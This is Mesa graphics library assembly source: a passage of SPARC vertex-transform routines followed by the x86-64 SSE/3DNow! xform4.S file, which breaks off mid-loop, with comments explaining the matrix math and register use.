fmuls %f1, M6, %f10 ! FGM Group f8 available
fadds %f4, %f8, %f4 ! FGA
fmuls %f0, M3, %f7 ! FGM Group f5 available
fmuls %f1, M7, %f11 ! FGM Group f9 available
fadds %f5, %f9, %f5 ! FGA
fmuls %f2, M8, %f12 ! FGM Group f6 available
fmuls %f2, M9, %f13 ! FGM Group f10, f4 available
fadds %f6, %f10, %f6 ! FGA
fmuls %f2, M10, %f14 ! FGM Group f7 available
fmuls %f2, M11, %f15 ! FGM Group f11, f5 available
fadds %f7, %f11, %f7 ! FGA
fmuls %f3, M12, %f8 ! FGM Group f12 available
fadds %f4, %f12, %f4 ! FGA
fmuls %f3, M13, %f9 ! FGM Group f13, f6 available
fadds %f5, %f13, %f5 ! FGA
fmuls %f3, M14, %f10 ! FGM Group f14 available
fadds %f6, %f14, %f6 ! FGA
fmuls %f3, M15, %f11 ! FGM Group f15, f7 available
fadds %f7, %f15, %f7 ! FGA
fadds %f4, %f8, %f4 ! FGA Group f8, f4 available
st %f4, [%g2 + 0x00] ! LSU
fadds %f5, %f9, %f5 ! FGA Group f9, f5 available
st %f5, [%g2 + 0x04] ! LSU
fadds %f6, %f10, %f6 ! FGA Group f10, f6 available
st %f6, [%g2 + 0x08] ! LSU
fadds %f7, %f11, %f7 ! FGA Group f11, f7 available
st %f7, [%g2 + 0x0c] ! LSU
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_4 ! tail-call: set dest size/flags to 4
nop
! _mesa_sparc_transform_points4_identity
! In: %o0 = dest vector, %o1 = matrix (unused), %o2 = source vector.
! Copies all four components of each point unchanged.
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride, %o1 loop counter.
.globl _mesa_sparc_transform_points4_identity
_mesa_sparc_transform_points4_identity:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0
ld [%g1 + 0x04], %f1
ld [%g1 + 0x08], %f2
add %o1, 1, %o1
ld [%g1 + 0x0c], %f3
add %g1, %o5, %g1
st %f0, [%g2 + 0x00]
st %f1, [%g2 + 0x04]
st %f2, [%g2 + 0x08]
cmp %o1, %g3
st %f3, [%g2 + 0x0c]
bne 1b
add %g2, 0x10, %g2 ! delay slot: advance dest
2:
ba __set_v4f_4 ! tail-call: set dest size/flags to 4
nop
! _mesa_sparc_transform_points4_2d
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Per point (x,y,z,w): dest = (x*M0+y*M4+w*M12, x*M1+y*M5+w*M13, z, w);
! z and w pass through untransformed.
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride, %o1 loop counter.
.globl _mesa_sparc_transform_points4_2d
_mesa_sparc_transform_points4_2d:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_4_5_12_13(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
ld [%g1 + 0x0c], %f3 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f4 ! FGM
fmuls %f1, M4, %f8 ! FGM Group
fmuls %f0, M1, %f5 ! FGM Group
fmuls %f1, M5, %f9 ! FGM Group f4 available
fmuls %f3, M12, %f12 ! FGM Group
fmuls %f3, M13, %f13 ! FGM Group f8 available
fadds %f4, %f8, %f4 ! FGA
fadds %f5, %f9, %f5 ! FGA Group stall, f5, f9 available
fadds %f4, %f12, %f4 ! FGA Group 2 cycle stall, f4, f12, f13 avail
st %f4, [%g2 + 0x00] ! LSU
fadds %f5, %f13, %f5 ! FGA Group f5 available
st %f5, [%g2 + 0x04] ! LSU
st %f2, [%g2 + 0x08] ! LSU Group
st %f3, [%g2 + 0x0c] ! LSU Group
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_4 ! tail-call: set dest size/flags to 4
nop
! _mesa_sparc_transform_points4_2d_no_rot
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Per point (x,y,z,w): dest = (x*M0+w*M12, y*M5+w*M13, z, w);
! z and w pass through untransformed.
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride, %o1 loop counter.
! FIX: load only the matrix entries the loop actually reads
! (M0, M5, M12, M13) via LDMATRIX_0_5_12_13, matching the other
! *_2d_no_rot routines; the previous LDMATRIX_0_1_4_5_12_13 also
! loaded M1 and M4, which this body never uses.
.globl _mesa_sparc_transform_points4_2d_no_rot
_mesa_sparc_transform_points4_2d_no_rot:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_5_12_13(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0
ld [%g1 + 0x04], %f1
ld [%g1 + 0x08], %f2
ld [%g1 + 0x0c], %f3
add %o1, 1, %o1
add %g1, %o5, %g1
fmuls %f0, M0, %f4
fmuls %f3, M12, %f8
fmuls %f1, M5, %f5
fmuls %f3, M13, %f9
fadds %f4, %f8, %f4
st %f4, [%g2 + 0x00]
fadds %f5, %f9, %f5
st %f5, [%g2 + 0x04]
st %f2, [%g2 + 0x08]
st %f3, [%g2 + 0x0c]
cmp %o1, %g3
bne 1b
add %g2, 0x10, %g2 ! delay slot: advance dest
2:
ba __set_v4f_4 ! tail-call: set dest size/flags to 4
nop
! _mesa_sparc_transform_points4_3d
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Per point (x,y,z,w): dest = (x*M0+y*M4+z*M8 +w*M12,
!                              x*M1+y*M5+z*M9 +w*M13,
!                              x*M2+y*M6+z*M10+w*M14, w).
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride, %o1 loop counter.
.globl _mesa_sparc_transform_points4_3d
_mesa_sparc_transform_points4_3d:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_1_2_4_5_6_8_9_10_12_13_14(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
ld [%g1 + 0x0c], %f3 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f4 ! FGM
fmuls %f1, M4, %f7 ! FGM Group
fmuls %f0, M1, %f5 ! FGM Group
fmuls %f1, M5, %f8 ! FGM Group
fmuls %f0, M2, %f6 ! FGM Group f4 available
fmuls %f1, M6, %f9 ! FGM Group f7 available
fadds %f4, %f7, %f4 ! FGA
fmuls %f2, M8, %f10 ! FGM Group f5 available
fmuls %f2, M9, %f11 ! FGM Group f8 available
fadds %f5, %f8, %f5 ! FGA
fmuls %f2, M10, %f12 ! FGM Group f6 available
fmuls %f3, M12, %f13 ! FGM Group f9, f4 available
fadds %f6, %f9, %f6 ! FGA
fmuls %f3, M13, %f14 ! FGM Group f10 available
fadds %f4, %f10, %f4 ! FGA
fmuls %f3, M14, %f15 ! FGM Group f11, f5 available
fadds %f5, %f11, %f5 ! FGA
fadds %f6, %f12, %f6 ! FGA Group stall, f12, f13, f6 available
fadds %f4, %f13, %f4 ! FGA Group f14, f4 available
st %f4, [%g2 + 0x00] ! LSU
fadds %f5, %f14, %f5 ! FGA Group f15, f5 available
st %f5, [%g2 + 0x04] ! LSU
fadds %f6, %f15, %f6 ! FGA Group f6 available
st %f6, [%g2 + 0x08] ! LSU
st %f3, [%g2 + 0x0c] ! LSU Group: w passes through
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_4 ! tail-call: set dest size/flags to 4
nop
! _mesa_sparc_transform_points4_3d_no_rot
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Per point (x,y,z,w): dest = (x*M0+w*M12, y*M5+w*M13, z*M10+w*M14, w).
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride, %o1 loop counter.
.globl _mesa_sparc_transform_points4_3d_no_rot
_mesa_sparc_transform_points4_3d_no_rot:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_5_10_12_13_14(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
ld [%g1 + 0x0c], %f3 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f4 ! FGM
fmuls %f3, M12, %f7 ! FGM Group
fmuls %f1, M5, %f5 ! FGM Group
fmuls %f3, M13, %f8 ! FGM Group
fmuls %f2, M10, %f6 ! FGM Group f4 available
fmuls %f3, M14, %f9 ! FGM Group f7 available
fadds %f4, %f7, %f4 ! FGA
st %f4, [%g2 + 0x00] ! LSU
fadds %f5, %f8, %f5 ! FGA Group stall, f5, f8 available
st %f5, [%g2 + 0x04] ! LSU
fadds %f6, %f9, %f6 ! FGA Group stall, f6, f9 available
st %f6, [%g2 + 0x08] ! LSU
st %f3, [%g2 + 0x0c] ! LSU Group: w passes through
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_4 ! tail-call: set dest size/flags to 4
nop
! _mesa_sparc_transform_points4_perspective
! In: %o0 = dest vector, %o1 = matrix data, %o2 = source vector.
! Per point (x,y,z,w): dest = (x*M0+z*M8, y*M5+z*M9, z*M10+w*M14, -z);
! the w output is -z via fnegs.
! Regs: %g1 src, %g2 dest, %g3 count, %o5 stride, %o1 loop counter.
.globl _mesa_sparc_transform_points4_perspective
_mesa_sparc_transform_points4_perspective:
ld [%o2 + V4F_STRIDE], %o5
LDPTR [%o2 + V4F_START], %g1
LDPTR [%o0 + V4F_START], %g2
ld [%o2 + V4F_COUNT], %g3
LDMATRIX_0_5_8_9_10_14(%o1)
cmp %g3, 0
st %g3, [%o0 + V4F_COUNT]
be 2f
clr %o1
1: ld [%g1 + 0x00], %f0 ! LSU Group
ld [%g1 + 0x04], %f1 ! LSU Group
ld [%g1 + 0x08], %f2 ! LSU Group
ld [%g1 + 0x0c], %f3 ! LSU Group
add %o1, 1, %o1 ! IEU0
add %g1, %o5, %g1 ! IEU1
fmuls %f0, M0, %f4 ! FGM
fmuls %f2, M8, %f7 ! FGM Group
fmuls %f1, M5, %f5 ! FGM Group
fmuls %f2, M9, %f8 ! FGM Group
fmuls %f2, M10, %f6 ! FGM Group f4 available
fmuls %f3, M14, %f9 ! FGM Group f7 available
fadds %f4, %f7, %f4 ! FGA
st %f4, [%g2 + 0x00] ! LSU
fadds %f5, %f8, %f5 ! FGA Group stall, f5, f8 available
st %f5, [%g2 + 0x04] ! LSU
fadds %f6, %f9, %f6 ! FGA Group stall, f6, f9 available
st %f6, [%g2 + 0x08] ! LSU
fnegs %f2, %f7 ! FGA Group: w = -z
st %f7, [%g2 + 0x0c] ! LSU
cmp %o1, %g3 ! IEU1
bne 1b ! CTI
add %g2, 0x10, %g2 ! IEU0 Group
2:
ba __set_v4f_4 ! tail-call: set dest size/flags to 4
nop
|
AIFM-sys/AIFM
| 13,542
|
shenango/apps/parsec/pkgs/libs/mesa/src/src/mesa/x86-64/xform4.S
|
/*
* Mesa 3-D graphics library
* Version: 7.1
*
* Copyright (C) 1999-2007 Brian Paul All Rights Reserved.
*
* Permission is hereby granted, free of charge, to any person obtaining a
* copy of this software and associated documentation files (the "Software"),
* to deal in the Software without restriction, including without limitation
* the rights to use, copy, modify, merge, publish, distribute, sublicense,
* and/or sell copies of the Software, and to permit persons to whom the
* Software is furnished to do so, subject to the following conditions:
*
* The above copyright notice and this permission notice shall be included
* in all copies or substantial portions of the Software.
*
* THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
* OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
* BRIAN PAUL BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
* AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
* CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
*/
#ifdef USE_X86_64_ASM
#include "matypes.h"
.text
.align 16
/*
 * _mesa_x86_64_transform_points4_general (AT&T syntax, SysV AMD64)
 * Full 4x4 SSE transform: for each source vertex (ox,oy,oz,ow),
 *   dest = ox*row0 + oy*row1 + oz*row2 + ow*row3 (rows of the matrix
 *   at 0/16/32/48(%rsi)).
 * Dest vertices are written with movaps — V4F_START of dest is assumed
 * 16-byte aligned; source is read with movups (unaligned OK).
 */
.globl _mesa_x86_64_transform_points4_general
_mesa_x86_64_transform_points4_general:
/*
 * rdi = dest
 * rsi = matrix
 * rdx = source
 */
movl V4F_COUNT(%rdx), %ecx /* count */
movzx V4F_STRIDE(%rdx), %eax /* stride */
movl %ecx, V4F_COUNT(%rdi) /* set dest count */
movl $4, V4F_SIZE(%rdi) /* set dest size */
.byte 0x66, 0x66, 0x66, 0x90 /* manual align += 3 */
orl $VEC_SIZE_4, V4F_FLAGS(%rdi)/* set dest flags */
testl %ecx, %ecx /* verify non-zero count */
prefetchnta 64(%rsi)
jz p4_general_done
movq V4F_START(%rdx), %rdx /* ptr to first src vertex */
movq V4F_START(%rdi), %rdi /* ptr to first dest vertex */
prefetch 16(%rdx)
movaps 0(%rsi), %xmm4 /* m3 | m2 | m1 | m0 */
movaps 16(%rsi), %xmm5 /* m7 | m6 | m5 | m4 */
.byte 0x66, 0x66, 0x90 /* manual align += 3 */
movaps 32(%rsi), %xmm6 /* m11 | m10 | m9 | m8 */
movaps 48(%rsi), %xmm7 /* m15 | m14 | m13 | m12 */
p4_general_loop:
movups (%rdx), %xmm8 /* ox | oy | oz | ow */
prefetchw 16(%rdi)
pshufd $0x00, %xmm8, %xmm0 /* ox | ox | ox | ox */
addq %rax, %rdx /* advance src by stride */
pshufd $0x55, %xmm8, %xmm1 /* oy | oy | oy | oy */
mulps %xmm4, %xmm0 /* ox*m3 | ox*m2 | ox*m1 | ox*m0 */
pshufd $0xAA, %xmm8, %xmm2 /* oz | oz | oz | oz */
mulps %xmm5, %xmm1 /* oy*m7 | oy*m6 | oy*m5 | oy*m4 */
pshufd $0xFF, %xmm8, %xmm3 /* ow | ow | ow | ow */
mulps %xmm6, %xmm2 /* oz*m11 | oz*m10 | oz*m9 | oz*m8 */
addps %xmm1, %xmm0 /* ox*m3+oy*m7 | ... */
mulps %xmm7, %xmm3 /* ow*m15 | ow*m14 | ow*m13 | ow*m12 */
addps %xmm2, %xmm0 /* ox*m3+oy*m7+oz*m11 | ... */
prefetch 16(%rdx)
addps %xmm3, %xmm0 /* ox*m3+oy*m7+oz*m11+ow*m15 | ... */
movaps %xmm0, (%rdi) /* ->D(3) | ->D(2) | ->D(1) | ->D(0) */
addq $16, %rdi
decl %ecx
jnz p4_general_loop
p4_general_done:
.byte 0xf3 /* REP prefix: forms "rep ret" (AMD branch-predictor idiom) */
ret
.section .rodata
.align 16
/*
 * Two 16-byte constants used by points4_3d below:
 *   [rax+0]  = mask {-1,-1,-1,0}: andps clears the 4th float of a row
 *   [rax+16] = {0,0,0,1.0f}:      orps sets the 4th float to 1.0
 */
p4_constants:
.byte 0xff, 0xff, 0xff, 0xff
.byte 0xff, 0xff, 0xff, 0xff
.byte 0xff, 0xff, 0xff, 0xff
.byte 0x00, 0x00, 0x00, 0x00 /* mask: keep elements 0-2, zero element 3 */
.byte 0x00, 0x00, 0x00, 0x00
.byte 0x00, 0x00, 0x00, 0x00
.byte 0x00, 0x00, 0x00, 0x00
.float 0f+1.0 /* element 3 of second constant = 1.0f */
.text
.align 16
.globl _mesa_x86_64_transform_points4_3d
/*
 * this is slower than _mesa_x86_64_transform_points4_general
 * because it ensures that the last matrix row (or is it column?) is 0,0,0,1
 */
/*
 * Same loop as points4_general, but the matrix rows are first masked
 * with p4_constants so their 4th element is forced to 0,0,0,1 —
 * guaranteeing dest w == source ow regardless of the stored matrix.
 */
_mesa_x86_64_transform_points4_3d:
leaq p4_constants(%rip), %rax /* RIP-relative; %rax reloaded with stride below */
prefetchnta 64(%rsi)
movaps (%rax), %xmm9 /* mask {-1,-1,-1,0} */
movaps 16(%rax), %xmm10 /* {0,0,0,1.0f} */
movl V4F_COUNT(%rdx), %ecx /* count */
movzx V4F_STRIDE(%rdx), %eax /* stride */
movl %ecx, V4F_COUNT(%rdi) /* set dest count */
movl $4, V4F_SIZE(%rdi) /* set dest size */
orl $VEC_SIZE_4, V4F_FLAGS(%rdi)/* set dest flags */
testl %ecx, %ecx /* verify non-zero count */
jz p4_3d_done
movq V4F_START(%rdx), %rdx /* ptr to first src vertex */
movq V4F_START(%rdi), %rdi /* ptr to first dest vertex */
prefetch 16(%rdx)
movaps 0(%rsi), %xmm4 /* m3 | m2 | m1 | m0 */
movaps 16(%rsi), %xmm5 /* m7 | m6 | m5 | m4 */
andps %xmm9, %xmm4 /* 0.0 | m2 | m1 | m0 */
movaps 32(%rsi), %xmm6 /* m11 | m10 | m9 | m8 */
andps %xmm9, %xmm5 /* 0.0 | m6 | m5 | m4 */
movaps 48(%rsi), %xmm7 /* m15 | m14 | m13 | m12 */
andps %xmm9, %xmm6 /* 0.0 | m10 | m9 | m8 */
andps %xmm9, %xmm7 /* 0.0 | m14 | m13 | m12 */
.byte 0x66, 0x66, 0x90 /* manual align += 3 */
orps %xmm10, %xmm7 /* 1.0 | m14 | m13 | m12 */
p4_3d_loop:
movups (%rdx), %xmm8 /* ox | oy | oz | ow */
prefetchw 16(%rdi)
pshufd $0x00, %xmm8, %xmm0 /* ox | ox | ox | ox */
addq %rax, %rdx /* advance src by stride */
pshufd $0x55, %xmm8, %xmm1 /* oy | oy | oy | oy */
mulps %xmm4, %xmm0 /* ox*m3 | ox*m2 | ox*m1 | ox*m0 */
pshufd $0xAA, %xmm8, %xmm2 /* oz | oz | oz | oz */
mulps %xmm5, %xmm1 /* oy*m7 | oy*m6 | oy*m5 | oy*m4 */
pshufd $0xFF, %xmm8, %xmm3 /* ow | ow | ow | ow */
mulps %xmm6, %xmm2 /* oz*m11 | oz*m10 | oz*m9 | oz*m8 */
addps %xmm1, %xmm0 /* ox*m3+oy*m7 | ... */
mulps %xmm7, %xmm3 /* ow*m15 | ow*m14 | ow*m13 | ow*m12 */
addps %xmm2, %xmm0 /* ox*m3+oy*m7+oz*m11 | ... */
prefetch 16(%rdx)
addps %xmm3, %xmm0 /* ox*m3+oy*m7+oz*m11+ow*m15 | ... */
movaps %xmm0, (%rdi) /* ->D(3) | ->D(2) | ->D(1) | ->D(0) */
addq $16, %rdi
dec %ecx
jnz p4_3d_loop
p4_3d_done:
.byte 0xf3 /* REP prefix: forms "rep ret" (AMD branch-predictor idiom) */
ret
.align 16
.globl _mesa_x86_64_transform_points4_identity
/*
 * Bulk copy of count vertices: 2 qwords (16 bytes) each via rep movsq.
 * NOTE(review): the stride is loaded into %eax but never used — the
 * copy assumes tightly packed 16-byte source vertices; confirm callers
 * only pass packed vectors here.
 */
_mesa_x86_64_transform_points4_identity:
movl V4F_COUNT(%rdx), %ecx /* count */
movzx V4F_STRIDE(%rdx), %eax /* stride */
movl %ecx, V4F_COUNT(%rdi) /* set dest count */
movl $4, V4F_SIZE(%rdi) /* set dest size */
orl $VEC_SIZE_4, V4F_FLAGS(%rdi)/* set dest flags */
test %ecx, %ecx
jz p4_identity_done
movq V4F_START(%rdx), %rsi /* ptr to first src vertex */
movq V4F_START(%rdi), %rdi /* ptr to first dest vertex */
prefetch 64(%rsi)
prefetchw 64(%rdi)
add %ecx, %ecx /* qword count = vertices * 2 */
rep movsq
p4_identity_done:
.byte 0xf3 /* REP prefix: forms "rep ret" (AMD branch-predictor idiom) */
ret
.align 16
.globl _mesa_x86_64_transform_points4_3d_no_rot
/*
 * 3DNow! (MMX/pfmul) path: scale by the diagonal m00/m11/m22 plus
 * translation row m30/m31/m32; w passes through via pfacc with mm7.
 * Must end with femms to restore the x87 state for callers.
 */
_mesa_x86_64_transform_points4_3d_no_rot:
movl V4F_COUNT(%rdx), %ecx /* count */
movzx V4F_STRIDE(%rdx), %eax /* stride */
movl %ecx, V4F_COUNT(%rdi) /* set dest count */
movl $4, V4F_SIZE(%rdi) /* set dest size */
.byte 0x66, 0x66, 0x90 /* manual align += 3 */
orl $VEC_SIZE_4, V4F_FLAGS(%rdi)/* set dest flags */
test %ecx, %ecx
.byte 0x66, 0x66, 0x90 /* manual align += 3 */
jz p4_3d_no_rot_done
movq V4F_START(%rdx), %rdx /* ptr to first src vertex */
movq V4F_START(%rdi), %rdi /* ptr to first dest vertex */
prefetch (%rdx)
movd (%rsi), %mm0 /* | m00 */
.byte 0x66, 0x66, 0x90 /* manual align += 3 */
punpckldq 20(%rsi), %mm0 /* m11 | m00 */
movd 40(%rsi), %mm2 /* | m22 */
movq 48(%rsi), %mm1 /* m31 | m30 */
punpckldq 56(%rsi), %mm2 /* m32 | m22 */
p4_3d_no_rot_loop:
prefetchw 32(%rdi)
movq (%rdx), %mm4 /* x1 | x0 */
movq 8(%rdx), %mm5 /* x3 | x2 */
movd 12(%rdx), %mm7 /* | x3 */
movq %mm5, %mm6 /* x3 | x2 */
pfmul %mm0, %mm4 /* x1*m11 | x0*m00 */
punpckhdq %mm6, %mm6 /* x3 | x3 */
pfmul %mm2, %mm5 /* x3*m32 | x2*m22 */
pfmul %mm1, %mm6 /* x3*m31 | x3*m30 */
pfacc %mm7, %mm5 /* x3 | x2*m22+x3*m32 */
pfadd %mm6, %mm4 /* x1*m11+x3*m31 | x0*m00+x3*m30 */
addq %rax, %rdx /* advance src by stride */
movq %mm4, (%rdi) /* write r0, r1 */
movq %mm5, 8(%rdi) /* write r2, r3 */
addq $16, %rdi
decl %ecx
prefetch 32(%rdx)
jnz p4_3d_no_rot_loop
p4_3d_no_rot_done:
femms /* exit MMX state before returning to FP code */
ret
/*
 * _mesa_x86_64_transform_points4_perspective
 * Transform by a typical perspective-projection matrix: only m00, m11,
 * m20, m21, m22, m32 are used, and the result w is -z (via pfsubr from 0).
 * 3DNow! implementation; femms clears the MMX state on exit.
 * In:  %rdi = dest GLvector4f, %rsi = matrix (column-major floats),
 *      %rdx = source GLvector4f.  %eax = source stride in bytes.
 */
.align 16
.globl _mesa_x86_64_transform_points4_perspective
_mesa_x86_64_transform_points4_perspective:
movl V4F_COUNT(%rdx), %ecx /* count */
movzx V4F_STRIDE(%rdx), %eax /* stride */
movl %ecx, V4F_COUNT(%rdi) /* set dest count */
movl $4, V4F_SIZE(%rdi) /* set dest size */
orl $VEC_SIZE_4, V4F_FLAGS(%rdi)/* set dest flags */
test %ecx, %ecx
.byte 0x66, 0x66, 0x90 /* manual align += 3 (nop: does not touch flags) */
jz p4_perspective_done
movq V4F_START(%rdx), %rdx /* ptr to first src vertex */
movq V4F_START(%rdi), %rdi /* ptr to first dest vertex */
movd (%rsi), %mm0 /* | m00 */
pxor %mm7, %mm7 /* 0 | 0 */
punpckldq 20(%rsi), %mm0 /* m11 | m00 */
movq 32(%rsi), %mm2 /* m21 | m20 */
prefetch (%rdx)
movd 40(%rsi), %mm1 /* | m22 */
.byte 0x66, 0x66, 0x90 /* manual align += 3 */
punpckldq 56(%rsi), %mm1 /* m32 | m22 */
p4_perspective_loop:
prefetchw 32(%rdi) /* prefetch 2 vertices ahead */
movq (%rdx), %mm4 /* x1 | x0 */
movq 8(%rdx), %mm5 /* x3 | x2 */
movd 8(%rdx), %mm3 /* | x2 */
movq %mm5, %mm6 /* x3 | x2 */
pfmul %mm0, %mm4 /* x1*m11 | x0*m00 */
punpckldq %mm5, %mm5 /* x2 | x2 */
pfmul %mm2, %mm5 /* x2*m21 | x2*m20 */
pfsubr %mm7, %mm3 /* | -x2 (result w) */
pfmul %mm1, %mm6 /* x3*m32 | x2*m22 */
pfadd %mm4, %mm5 /* x1*m11+x2*m21 | x0*m00+x2*m20 */
pfacc %mm3, %mm6 /* -x2 | x2*m22+x3*m32 */
movq %mm5, (%rdi) /* write r0, r1 */
addq %rax, %rdx /* advance src by stride */
movq %mm6, 8(%rdi) /* write r2, r3 */
addq $16, %rdi
decl %ecx
prefetch 32(%rdx) /* hopefully stride is zero */
jnz p4_perspective_loop
p4_perspective_done:
femms
ret
/*
 * _mesa_x86_64_transform_points4_2d_no_rot
 * 2D scale + translate: only m00, m11 and m30/m31 are used; z and w
 * (the high qword of each vertex) pass through unchanged via %mm5.
 * 3DNow! implementation; femms clears the MMX state on exit.
 * In:  %rdi = dest GLvector4f, %rsi = matrix (column-major floats),
 *      %rdx = source GLvector4f.  %eax = source stride in bytes.
 */
.align 16
.globl _mesa_x86_64_transform_points4_2d_no_rot
_mesa_x86_64_transform_points4_2d_no_rot:
movl V4F_COUNT(%rdx), %ecx /* count */
movzx V4F_STRIDE(%rdx), %eax /* stride */
movl %ecx, V4F_COUNT(%rdi) /* set dest count */
movl $4, V4F_SIZE(%rdi) /* set dest size */
orl $VEC_SIZE_4, V4F_FLAGS(%rdi)/* set dest flags */
test %ecx, %ecx
.byte 0x90 /* manual align += 1 (single-byte nop) */
jz p4_2d_no_rot_done
movq V4F_START(%rdx), %rdx /* ptr to first src vertex */
movq V4F_START(%rdi), %rdi /* ptr to first dest vertex */
movd (%rsi), %mm0 /* | m00 */
prefetch (%rdx)
punpckldq 20(%rsi), %mm0 /* m11 | m00 */
movq 48(%rsi), %mm1 /* m31 | m30 */
p4_2d_no_rot_loop:
prefetchw 32(%rdi) /* prefetch 2 vertices ahead */
movq (%rdx), %mm4 /* x1 | x0 */
movq 8(%rdx), %mm5 /* x3 | x2 (passed through) */
pfmul %mm0, %mm4 /* x1*m11 | x0*m00 */
movq %mm5, %mm6 /* x3 | x2 */
punpckhdq %mm6, %mm6 /* x3 | x3 */
addq %rax, %rdx /* advance src by stride */
pfmul %mm1, %mm6 /* x3*m31 | x3*m30 */
prefetch 32(%rdx) /* hopefully stride is zero */
pfadd %mm4, %mm6 /* x1*m11+x3*m31 | x0*m00+x3*m30 */
movq %mm6, (%rdi) /* write r0, r1 */
movq %mm5, 8(%rdi) /* write r2, r3 */
addq $16, %rdi
decl %ecx
jnz p4_2d_no_rot_loop
p4_2d_no_rot_done:
femms
ret
/*
 * _mesa_x86_64_transform_points4_2d
 * Full 2D transform: uses m00, m01, m10, m11 plus translation m30/m31;
 * z and w (high qword of each vertex) pass through unchanged via %mm5.
 * 3DNow! implementation; femms clears the MMX state on exit.
 * In:  %rdi = dest GLvector4f, %rsi = matrix (column-major floats),
 *      %rdx = source GLvector4f.  %eax = source stride in bytes.
 */
.align 16
.globl _mesa_x86_64_transform_points4_2d
_mesa_x86_64_transform_points4_2d:
movl V4F_COUNT(%rdx), %ecx /* count */
movzx V4F_STRIDE(%rdx), %eax /* stride */
movl %ecx, V4F_COUNT(%rdi) /* set dest count */
movl $4, V4F_SIZE(%rdi) /* set dest size */
.byte 0x66, 0x66, 0x90 /* manual align += 3 (3-byte nop) */
orl $VEC_SIZE_4, V4F_FLAGS(%rdi)/* set dest flags */
test %ecx, %ecx
.byte 0x66, 0x66, 0x90 /* manual align += 3 (nop: does not touch flags) */
jz p4_2d_done
movq V4F_START(%rdx), %rdx /* ptr to first src vertex */
movq V4F_START(%rdi), %rdi /* ptr to first dest vertex */
movd (%rsi), %mm0 /* | m00 */
movd 4(%rsi), %mm1 /* | m01 */
prefetch (%rdx)
punpckldq 16(%rsi), %mm0 /* m10 | m00 */
.byte 0x66, 0x66, 0x90 /* manual align += 3 */
punpckldq 20(%rsi), %mm1 /* m11 | m01 */
movq 48(%rsi), %mm2 /* m31 | m30 */
p4_2d_loop:
prefetchw 32(%rdi) /* prefetch 2 vertices ahead */
movq (%rdx), %mm3 /* x1 | x0 */
movq 8(%rdx), %mm5 /* x3 | x2 (passed through) */
movq %mm3, %mm4 /* x1 | x0 */
movq %mm5, %mm6 /* x3 | x2 */
pfmul %mm1, %mm4 /* x1*m11 | x0*m01 */
punpckhdq %mm6, %mm6 /* x3 | x3 */
pfmul %mm0, %mm3 /* x1*m10 | x0*m00 */
addq %rax, %rdx /* advance src by stride */
pfacc %mm4, %mm3 /* x0*m01+x1*m11 | x0*m00+x1*m10 */
pfmul %mm2, %mm6 /* x3*m31 | x3*m30 */
prefetch 32(%rdx) /* hopefully stride is zero */
pfadd %mm6, %mm3 /* r1 | r0 */
movq %mm3, (%rdi) /* write r0, r1 */
movq %mm5, 8(%rdi) /* write r2, r3 */
addq $16, %rdi
decl %ecx
